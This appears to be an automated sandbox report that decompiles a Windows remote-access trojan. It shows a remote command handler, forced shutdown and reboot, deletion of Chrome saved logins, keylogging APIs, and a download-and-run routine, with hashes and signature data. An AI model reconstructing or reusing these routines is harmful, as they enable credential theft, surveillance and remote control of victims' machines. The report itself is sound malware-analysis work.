                    							_t156 = E00410C3C(_t165, _t162,  *_t158,  *((intOrPtr*)(_t158 + 4)));
                    							_t369 = _t370 + 0x24;
                    						} else {
                    							_push(_t146);
                    							E00401E49( &_v92, __edx, __eflags, _t328);
                    							_push(E00402489());
                    							_push(E00401F95(E00401E49( &_v92, __edx, __eflags, _t328)));
                    							_t171 = E00401F95(E00401E49( &_v96, _t320, __eflags, 2));
                    							_t173 = E00401F95(E00401E49( &_v100, _t320, __eflags, 1));
                    							_t330 = 0;
                    							_t174 = E00401E49( &_v104, _t320, __eflags, 0);
                    							_t372 = _t353 - 0x18;
                    							E004020EC(_t203, _t372, _t320, __eflags, _t174);
                    							_t176 = E00410FB5(_t203, __eflags, _t171);
                    							_t320 = _t173;
                    							_t156 = E00410B08(_t176, _t173);
                    							_t369 = _t372 + 0x28;
                    						}
                    					}
                    					_t358 = _t369 - 0x18;
                    					_t233 = _t369 - 0x18;
                    					__eflags = _t156;
                    					if(__eflags == 0) {
                    						_push("5");
                    						goto L33;
                    					} else {
                    						_push("4");
                    						goto L20;
                    					}
                    				}
                    				_t384 = _t341 != 1;
                    				if(_t341 != 1) {
                    					goto L39;
                    				}
                    				E0040427F(_t203,  &_v80, E00401F95(E00401E49( &_v88, __edx, _t384, 1)));
                    				_t181 = E00401EEB( &_v84);
                    				_t182 = E00401E49( &_v96, __edx, _t384, 0);
                    				_t374 = _t353 - 0x18;
                    				E004020EC(_t203, _t374, __edx, _t384, _t182);
                    				// '9': create a key. 0x20006 == KEY_WRITE (READ_CONTROL | KEY_SET_VALUE | KEY_CREATE_SUB_KEY);
                    				// argument slots are as the decompiler recovered them. Failure replies "7", success "6".
                    				_t185 = RegCreateKeyExW(E00410FB5(_t203, _t384, _t181), 0, 0, 0, 0x20006, 0,  &_v104, 0, ??);
                    				RegCloseKey(_v112);
                    				_t376 = _t374 + 0x18 - 0x18;
                    				_t247 = _t374 + 0x18 - 0x18;
                    				_t385 = _t185;
                    				if(_t185 != 0) {
                    					_push("7");
                    					goto L12;
                    				}
                    				E00402084(_t203, _t247, "6");
                    				_push(0x72);
                    				E00404AA4(_t203, 0x46c700, _t320, _t385);
                    				_t205 = E00407323( &_v108, 0x46c700, 0x46c700);
                    				_t386 = _t205 - 0xffffffff;
                    				if(_t205 != 0xffffffff) {
                    					_t14 = _t205 + 1; // 0x1
                    					_t347 = 2;
                    					_push( ~(__eflags > 0) | _t14 * _t347);
                    					_v112 = E0042F4C6( ~(__eflags > 0) | _t14 * _t347, _t14 * _t347 >> 0x20, _t347, __eflags);
                    					_t195 = E00401EEB(E00407309( &_v96,  &_v48, 0, _t205));
                    					_t206 = _v124;
                    					_t326 = _v124 - _t195;
                    					__eflags = _t326;
                    					do {
                    						_t313 =  *_t195 & 0x0000ffff;
                    						 *(_t326 + _t195) = _t313;
                    						_t195 = _t195 + _t347;
                    						__eflags = _t313;
                    					} while (__eflags != 0);
                    					E00401EF0();
                    					E004020EC(_t206, _t376 - 0x18, _t326, __eflags, E00401E49( &_v108, _t326, __eflags, 0));
                    					_t320 = 0;
                    					E00411046(_t206, 0, __eflags);
                    					E0042F4CF(_t206);
                    					goto L38;
                    				}
                    				E004020EC(_t205, _t376 - 0x18, _t320, _t386, E00401E49( &_v108, _t320, _t386, 0));
                    				_t320 = 0;
                    				_t217 = 0;
                    				goto L37;
                    			}
                    [Per-line instruction address column for E00411205 (0x00411205 to 0x004117f0) omitted; call sites are listed under APIs below.]

                    APIs
                    • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004112DA
                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004112E6
                      • Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18
                    • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004115C7
                    • GetProcAddress.KERNEL32(00000000), ref: 004115CE
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: AddressCloseCreateLibraryLoadProcsend
                    • String ID: SHDeleteKeyW$Shlwapi.dll
                    • API String ID: 2127411465-314212984
                    • Opcode ID: 99f62ac9a590e2cf4881d49ade79f59edc62e509e2edc6cc5568f42b4cc4750c
                    • Instruction ID: 42533e532c22dbc36938cc4a5415c4332dc933708f84597f9d810698dd7565cc
                    • Opcode Fuzzy Hash: 99f62ac9a590e2cf4881d49ade79f59edc62e509e2edc6cc5568f42b4cc4750c
                    • Instruction Fuzzy Hash: B4E1D171A043005BCA14B7B6CC5B9BF76A95B95708F40052FFA42B71F3EE7C8948869A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 62%
                    			// Power / session command handler. E00413958 (see the subcall APIs below) enables
                    			// SeShutdownPrivilege on the current token; E00405A6F(literal) then compares the command
                    			// argument with "0".."4" (non-zero on match): "0" passes the caller's ExitWindowsEx flags
                    			// through, "1" adds EWX_SHUTDOWN, "2" adds EWX_REBOOT, "3" sleeps and "4" hibernates via
                    			// PowrProf!SetSuspendState, which is resolved at runtime.
                    			E00412BE1(void* __edx, void* __ebp, void* __eflags, char _a12, char _a16, void* _a128, void* _a152) {
                    				void* _t12;
                    				int _t14;
                    				int _t20;
                    				int _t22;
                    				int _t31;
                    				intOrPtr* _t64;
                    				void* _t69;
                    
                    				_t69 = __eflags;
                    				E00413958();
                    				E00401E49( &_a16, __edx, _t69, 0);
                    				_t12 = E00405A6F("0");
                    				_push(0);
                    				_t70 = _t12;
                    				if(_t12 == 0) {
                    					E00401E49( &_a12, "0", __eflags);
                    					_t14 = E00405A6F("1");
                    					_push(0);
                    					__eflags = _t14;
                    					if(__eflags == 0) {
                    						E00401E49( &_a12, "1", __eflags);
                    						__eflags = E00405A6F("2");
                    						if(__eflags == 0) {
                    							_t64 = GetProcAddress(LoadLibraryA("PowrProf.dll"), "SetSuspendState"); // SetSuspendState(Hibernate, ForceCritical, DisableWakeEvent)
                    							E00401E49( &_a16, "2", __eflags, 0);
                    							_t62 = "3";
                    							_t20 = E00405A6F("3");
                    							_push(0);
                    							__eflags = _t20;
                    							if(__eflags == 0) {
                    								E00401E49( &_a16, "3", __eflags);
                    								_t62 = "4";
                    								_t22 = E00405A6F("4");
                    								__eflags = _t22;
                    								if(_t22 != 0) {
                    									_push(0);
                    									_push(0);
                    									_push(1); // Hibernate = TRUE for "4"; the "3" path below pushes 0 and only sleeps
                    									goto L11;
                    								}
                    							} else {
                    								_push(0);
                    								_push(0);
                    								L11:
                    								 *_t64();
                    							}
                    						} else {
                    							_push(0);
                    							_t31 = E00436769(_t28, E00401F95(E00401E49( &_a16, "2", __eflags, 1))) | 0x00000002; // EWX_REBOOT
                    							__eflags = _t31;
                    							goto L6;
                    						}
                    					} else {
                    						_t31 = E00436769(_t33, E00401F95(E00401E49( &_a12, "1", __eflags, 1))) | 0x00000001; // EWX_SHUTDOWN
                    						goto L6;
                    					}
                    				} else {
                    					_t31 = E00436769(_t36, E00401F95(E00401E49( &_a12, "0", _t70, 1))); // "0": ExitWindowsEx flags taken verbatim from the command argument
                    					L6:
                    					ExitWindowsEx(_t31, ??);
                    				}
                    				_t7 =  &_a16; // 0x404538
                    				E00401E74(_t7, _t62);
                    				E00401FC7();
                    				E00401FC7();
                    				return 0;
                    			}

                    [Per-line instruction address column for E00412BE1 (0x00412be1 to 0x004133ed) omitted; call sites are listed under APIs below.]

                    APIs
                      • Part of subcall function 00413958: GetCurrentProcess.KERNEL32(00000028,?), ref: 00413965
                      • Part of subcall function 00413958: OpenProcessToken.ADVAPI32(00000000), ref: 0041396C
                      • Part of subcall function 00413958: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0041397E
                      • Part of subcall function 00413958: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0041399D
                      • Part of subcall function 00413958: GetLastError.KERNEL32 ref: 004139A3
                    • ExitWindowsEx.USER32(00000000,00000001), ref: 00412C83
                    • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00412C98
                    • GetProcAddress.KERNEL32(00000000), ref: 00412C9F
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                    • String ID: 8E@$PowrProf.dll$SetSuspendState
                    • API String ID: 1589313981-2852448523
                    • Opcode ID: 84e4273dad6898ce6175a8507001792fcf22cc362d39f8daaa1f1a75ebb4b646
                    • Instruction ID: e957077d6b30f4f4fae2d85640c458a1662694f4678ee8a5b01da8d46abf5029
                    • Opcode Fuzzy Hash: 84e4273dad6898ce6175a8507001792fcf22cc362d39f8daaa1f1a75ebb4b646
                    • Instruction Fuzzy Hash: 8621A9706043019BDA04FBF399569AF62499B4434DF10483F7A02BB1E3EF7C8D49865E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 75%
                    			E00409EF4(void* __edi, void* __eflags) {
                    				char _v28;
                    				char _v52;
                    				void* __ebx;
                    				void* __ebp;
                    				long _t18;
                    				void* _t20;
                    				void* _t21;
                    				void* _t28;
                    				void* _t31;
                    				void* _t32;
                    
                    				_t35 = __eflags;
                    				_t31 = __edi;
                    				_t30 = E00402084(_t20,  &_v52, E0043988A(_t20, __eflags, "UserProfile"));
                    				E00405343(_t20,  &_v28, _t7, _t31, _t35, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data");
                    				E00401FC7();
                    				if(DeleteFileA(E00401F95( &_v28)) != 0) {
                    					_t28 = _t32 - 0x18;
                    					_push("\n[Chrome StoredLogins found, cleared!]");
                    					goto L6;
                    				} else {
                    					_t18 = GetLastError();
                    					if(_t18 == 0 || _t18 == 1) {
                    						_t28 = _t32 - 0x18;
                    						_push("\n[Chrome StoredLogins not found]");
                    						L6:
                    						E00402084(_t20, _t28);
                    						E0040A6EF(_t20, _t30, __eflags);
                    						_t21 = 1;
                    					} else {
                    						_t21 = 0;
                    					}
                    				}
                    				E00401FC7();
                    				return _t21;
                    			}

                    0x00409ef4
                    0x00409ef4
                    0x00409f14
                    0x00409f19
                    0x00409f22
                    0x00409f38
                    0x00409f5e
                    0x00409f60
                    0x00000000
                    0x00409f3a
                    0x00409f41
                    0x00409f44
                    0x00409f52
                    0x00409f54
                    0x00409f65
                    0x00409f65
                    0x00409f6a
                    0x00409f6f
                    0x00409f4b
                    0x00409f4b
                    0x00409f4b
                    0x00409f44
                    0x00409f77
                    0x00409f82

                    APIs
                    • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 00409F30
                    • GetLastError.KERNEL32 ref: 00409F3A
                    Strings
                    • [Chrome StoredLogins found, cleared!], xrefs: 00409F60
                    • UserProfile, xrefs: 00409F00
                    • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 00409EFB
                    • [Chrome StoredLogins not found], xrefs: 00409F54
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: DeleteErrorFileLast
                    • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    • API String ID: 2018770650-1062637481
                    • Opcode ID: 5358e033f04b3ba735fafe0af648e29bda63c7f1275d163f1c5bcd61de560829
                    • Instruction ID: 7275058c39cf6625061bb5575175bc96433b562b483ef1af331301c458370d0d
                    • Opcode Fuzzy Hash: 5358e033f04b3ba735fafe0af648e29bda63c7f1275d163f1c5bcd61de560829
                    • Instruction Fuzzy Hash: 1A01A72165020757C609BAB5DD5B8BE7724A911309B50027FF806B61E3FD795E08C6DF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00413958() {
                    				void* _v8;
                    				intOrPtr _v12;
                    				struct _TOKEN_PRIVILEGES _v24;
                    
                    				OpenProcessToken(GetCurrentProcess(), 0x28,  &_v8);
                    				LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                    				_v24.PrivilegeCount = 1;
                    				_v12 = 2;
                    				AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0);
                    				return GetLastError() & 0xffffff00 | _t16 != 0x00000000;
                    			}

                    0x0041396c
                    0x0041397e
                    0x0041398a
                    0x00413996
                    0x0041399d
                    0x004139b2

                    APIs
                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 00413965
                    • OpenProcessToken.ADVAPI32(00000000), ref: 0041396C
                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0041397E
                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0041399D
                    • GetLastError.KERNEL32 ref: 004139A3
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                    • String ID: SeShutdownPrivilege
                    • API String ID: 3534403312-3733053543
                    • Opcode ID: 94602a98415b27b9a6c2aabf7476c335bfb2bc105e34b2d46e9cbd2c65603840
                    • Instruction ID: fcc62124dca6382e8ff7f462a1d037d759b9923c43a5f98482535144c24e2b82
                    • Opcode Fuzzy Hash: 94602a98415b27b9a6c2aabf7476c335bfb2bc105e34b2d46e9cbd2c65603840
                    • Instruction Fuzzy Hash: 44F03A71902229ABDB10AFA0ED0DAEFBF7CEF05652F100064B805A1056E6348B14CAB5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: __floor_pentium4
                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                    • API String ID: 4168288129-2761157908
                    • Opcode ID: 42261130ad1b2c87b12dda9ae586fc566389ec3ff41f756cf8e7a1c957aab040
                    • Instruction ID: bf911c1a37dbfafd62c1db5ad45da0714cb81aa7e36eaf23024dd27f54a8ec40
                    • Opcode Fuzzy Hash: 42261130ad1b2c87b12dda9ae586fc566389ec3ff41f756cf8e7a1c957aab040
                    • Instruction Fuzzy Hash: D2C24872E086288FEB25CE299D407EAB7B5FB44305F1541EBD80DE7240E778AE818F45
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • __EH_prolog.LIBCMT ref: 004077F1
                      • Part of subcall function 00404A08: connect.WS2_32(?,?,00000010), ref: 00404A23
                      • Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040789E
                    • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 004078FC
                    • FindNextFileW.KERNEL32(00000000,?), ref: 00407954
                    • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040796B
                      • Part of subcall function 00404E0B: closesocket.WS2_32(?), ref: 00404E11
                    • FindClose.KERNEL32(00000000), ref: 00407BA9
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: Find$CloseFile$Exception@8FirstH_prologNextThrowclosesocketconnectsend
                    • String ID:
                    • API String ID: 2104358809-0
                    • Opcode ID: d5325abe13c347f29ec421261d5b7aba2d638baced682e6bed6f7fc6740840f6
                    • Instruction ID: c2b305b608749dbe3c980790889d4cdccc335bbb97c8ab2c1357a9fa12a4aca1
                    • Opcode Fuzzy Hash: d5325abe13c347f29ec421261d5b7aba2d638baced682e6bed6f7fc6740840f6
                    • Instruction Fuzzy Hash: DAC170729041099ADB14FB61CD52AEE7375AF10318F10417FE906B71D2EF386B49CB99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetForegroundWindow.USER32(00000000,?,00000000), ref: 004089EE
                    • GetWindowThreadProcessId.USER32(00000000,?), ref: 004089F9
                    • GetKeyboardLayout.USER32(00000000), ref: 00408A00
                    • GetKeyState.USER32(00000010), ref: 00408A0A
                    • GetKeyboardState.USER32(?), ref: 00408A17
                    • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00408A33
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
                    • String ID:
                    • API String ID: 3566172867-0
                    • Opcode ID: 28d55651ec39c1e0e1e44cca33abdfe281183258b8dcf964721f4baf851690d3
                    • Instruction ID: 26b3eb51535ef2b13c0bd12becad5a44fa7f6c6827bdf572dc9a3ff542bbf600
                    • Opcode Fuzzy Hash: 28d55651ec39c1e0e1e44cca33abdfe281183258b8dcf964721f4baf851690d3
                    • Instruction Fuzzy Hash: B2110072900208BBDB109FA4DC49FEA77ACEB0C746F100465FA04E6191DA75EA54CB64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0044A9DB,?,00000000), ref: 0044A755
                    • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0044A9DB,?,00000000), ref: 0044A77E
                    • GetACP.KERNEL32(?,?,0044A9DB,?,00000000), ref: 0044A793
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: InfoLocale
                    • String ID: ACP$OCP
                    • API String ID: 2299586839-711371036
                    • Opcode ID: eca72fe68e61a17013779279ff44b1afc3dcda18dc1819e1e1cc02f4b6913e30
                    • Instruction ID: 46499b20fc6e19d8fdaaf79e5441ca5821e5cfb246ab753f5a47199e6154391f
                    • Opcode Fuzzy Hash: eca72fe68e61a17013779279ff44b1afc3dcda18dc1819e1e1cc02f4b6913e30
                    • Instruction Fuzzy Hash: 3C21F876680200A6F730CF64C901B9773BAEF54F65B568427E80AC7312E73ADD61C39A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • FindResourceA.KERNEL32(SETTINGS,0000000A), ref: 00416C4A
                    • LoadResource.KERNEL32(00000000,?,?,?,0040CC70), ref: 00416C5E
                    • LockResource.KERNEL32(00000000,?,?,?,0040CC70), ref: 00416C65
                    • SizeofResource.KERNEL32(00000000,?,?,?,0040CC70), ref: 00416C74
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: Resource$FindLoadLockSizeof
                    • String ID: SETTINGS
                    • API String ID: 3473537107-594951305
                    • Opcode ID: 366bf9c706c1e74d5dfbd1c4b7779a97350d9a524096fbd79053f48df9282c47
                    • Instruction ID: 37f18acc70127db685c8f9ca998c816c09d2ba1f0d15f4cc177e32bd420b5c87
                    • Opcode Fuzzy Hash: 366bf9c706c1e74d5dfbd1c4b7779a97350d9a524096fbd79053f48df9282c47
                    • Instruction Fuzzy Hash: 72E01A36600790ABD7211FB1AC4CD173E79EFCABA37100035F601C6221EB76C880CB99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • __EH_prolog.LIBCMT ref: 00407C5A
                      • Part of subcall function 00407514: char_traits.LIBCPMT ref: 0040752F
                    • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 00407CD2
                    • FindNextFileW.KERNEL32(00000000,?), ref: 00407CFB
                    • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00407D12
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseFirstH_prologNextchar_traits
                    • String ID:
                    • API String ID: 3260228402-0
                    • Opcode ID: bf98f09b1d7c52afb730002c3bb8bf2a6021080ad7ea1047f96c538e4cc49e73
                    • Instruction ID: 3f7feca7001ac29e2efe6dfa4d48dadfc39b28ff3590cbdafeaa97567dc4b3d4
                    • Opcode Fuzzy Hash: bf98f09b1d7c52afb730002c3bb8bf2a6021080ad7ea1047f96c538e4cc49e73
                    • Instruction Fuzzy Hash: 5C915E329041099BCB15EB61CD919EE7379AF20348F10417FE906B71E2EF386B49DB99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
                      • Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
                      • Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
                      • Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60
                      • Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D41
                      • Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D4E
                    • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0044A99C
                    • IsValidCodePage.KERNEL32(00000000), ref: 0044A9F7
                    • IsValidLocale.KERNEL32(?,00000001), ref: 0044AA06
                    • GetLocaleInfoW.KERNEL32(?,00001001,0043E2C1,00000040,?,0043E3E1,00000055,00000000,?,?,00000055,00000000), ref: 0044AA4E
                    • GetLocaleInfoW.KERNEL32(?,00001002,0043E341,00000040), ref: 0044AA6D
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                    • String ID:
                    • API String ID: 745075371-0
                    • Opcode ID: ee551fdf1c3de97742cd8df79b3566f25b0096286ea1fed63c8c741eae7e60fe
                    • Instruction ID: 9b105efebd2c88567e68d059c0bbbfc36751d73e0e30cf1546c616c965cf3a16
                    • Opcode Fuzzy Hash: ee551fdf1c3de97742cd8df79b3566f25b0096286ea1fed63c8c741eae7e60fe
                    • Instruction Fuzzy Hash: CC5181B1940205ABFB10DFA5CC45ABF73B8BF08701F15486BE900E7291D7789914CB6A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00405DA3
                    • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00405E87
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: DownloadExecuteFileShell
                    • String ID: C:\Windows\SysWOW64\DpiScaling.exe$open
                    • API String ID: 2825088817-3153102537
                    • Opcode ID: e0485a9113288dd0168ce50b722bb27cda49acde5fb3046a2836ae3b189f4bf3
                    • Instruction ID: 2f760819637a24086e5c2a0131b8e6f6cb93aac805846b5c6f9a7bfdcc7dded0
                    • Opcode Fuzzy Hash: e0485a9113288dd0168ce50b722bb27cda49acde5fb3046a2836ae3b189f4bf3
                    • Instruction Fuzzy Hash: 9C61B37160430157CA14FB76C85697F37A99F95308F10093FB9467B1E3EE3C8A498A9B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
                      • Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
                      • Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
                      • Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60
                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,0043E2C8,?,?,?,?,0043DD1F,?,00000004), ref: 0044A03A
                    • _wcschr.LIBVCRUNTIME ref: 0044A0CA
                    • _wcschr.LIBVCRUNTIME ref: 0044A0D8
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,0043E2C8,00000000,0043E3E8), ref: 0044A17B
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                    • String ID:
                    • API String ID: 4212172061-0
                    • Opcode ID: a93cbbae9c8a1cc1fc9dd236a8a740af6bdf31657da38eb13c6d36a73e99b63a
                    • Instruction ID: 0c1e26b01cd281ff3e6eed0d7611659232f5724f520d43583c2334efc1484ff5
                    • Opcode Fuzzy Hash: a93cbbae9c8a1cc1fc9dd236a8a740af6bdf31657da38eb13c6d36a73e99b63a
                    • Instruction Fuzzy Hash: 5B610771640606AAFB24AF75CC86AA773A8EF08305F14002FF905D7282EB78ED54D769
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00417614: GetCurrentProcess.KERNEL32(?,?,?,004180D1,WinDir,00000000,00000000), ref: 00417625
                      • Part of subcall function 00417614: IsWow64Process.KERNEL32(00000000,?,?,004180D1,WinDir,00000000,00000000), ref: 0041762C
                    • CreateToolhelp32Snapshot.KERNEL32 ref: 0040D231
                    • Process32FirstW.KERNEL32(00000000,?), ref: 0040D253
                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040D3DA
                    • CloseHandle.KERNEL32(00000000), ref: 0040D3E9
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: ProcessProcess32$CloseCreateCurrentFirstHandleNextSnapshotToolhelp32Wow64
                    • String ID:
                    • API String ID: 715332099-0
                    • Opcode ID: 71b305a050fb6ff9cac642b07f25a1a89c1079984eaa90e557e86da1c3795d5c
                    • Instruction ID: 43f38b1539949543322e8b732d0e6a0d6251ec8b58a184f5b0d342f80c8325cc
                    • Opcode Fuzzy Hash: 71b305a050fb6ff9cac642b07f25a1a89c1079984eaa90e557e86da1c3795d5c
                    • Instruction Fuzzy Hash: CD415D319142198BCB15FB66DC51AEEB375AF50304F1001BEB40AB61E2EF786F89DE58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
                      • Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
                      • Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
                      • Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60
                      • Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D41
                      • Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D4E
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044A397
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044A3E8
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044A4A8
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: ErrorInfoLastLocale$_free$_abort
                    • String ID:
                    • API String ID: 2829624132-0
                    • Opcode ID: b14c01951aef5a3ce9e700fe29605e893b340df90a5e0dffce6f4a8b69f02f7e
                    • Instruction ID: b8f74ff5e519f84a9dadc1d099471af389f48447beb5eaa2b6f47629cec96164
